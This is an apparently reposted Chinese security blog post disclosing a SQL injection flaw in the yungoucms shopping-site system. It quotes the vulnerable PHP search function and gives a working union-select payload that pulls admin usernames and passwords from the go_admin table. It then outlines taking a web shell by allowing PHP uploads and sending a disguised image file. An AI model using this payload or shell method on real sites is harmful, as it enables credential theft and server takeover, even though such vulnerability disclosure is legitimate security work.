yungoucms系统最新SQL注入 – 网站安全 – 自学php

时间: 2020-10-10|tag: 66次围观|0 条评论

官网 : http://www.yungoucms.com/ 演示站: http://www.yungoucms.cn/ 商品搜索可以构建SQL语句!   http://www.yungoucms.cn/?/s_tag/     

public function tag(){



$search =$this->segment(4);

if(!$search)_message("输入搜索关键字");

$search = urldecode($search);

$search = htmlspecialchars($search);

if(!_is_utf8($search)){

$search = iconv("GBK", "UTF-8", $search);

}

$mysql_model=System::load_sys_class(''model'');

$title=$search.'' - ''._cfg(''web_name'');

$shoplist=$mysql_model->GetList("select thumb,id,sid,zongrenshu,canyurenshu,shenyurenshu,money from `@#_shoplist` WHERE `title` LIKE ''%".$search."%''");

$list=count($shoplist);

include templates("search","search");



}

 

  构建SQL语句   yun%%27 union select 1,2,3,group_concat(username),5,6,7 from go_admin%23 查看网页源文件就能得到用户信息 密码同样道理。   注入出来的账号密码藏入标签里面去了。查看就OK 。   拿到账号密码 至于后台拿shell 可以自己设置上传的类型   添加php后 不过要上传图片马才可以上去。

    上一篇: 一次通过漏洞挖掘成功渗透某网站的过程 - 网站

    下一篇: 方维团购系统sql漏洞影响至最新4.2版 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《yungoucms系统最新SQL注入 – 网站安全 – 自学php
   

还没有人抢沙发呢~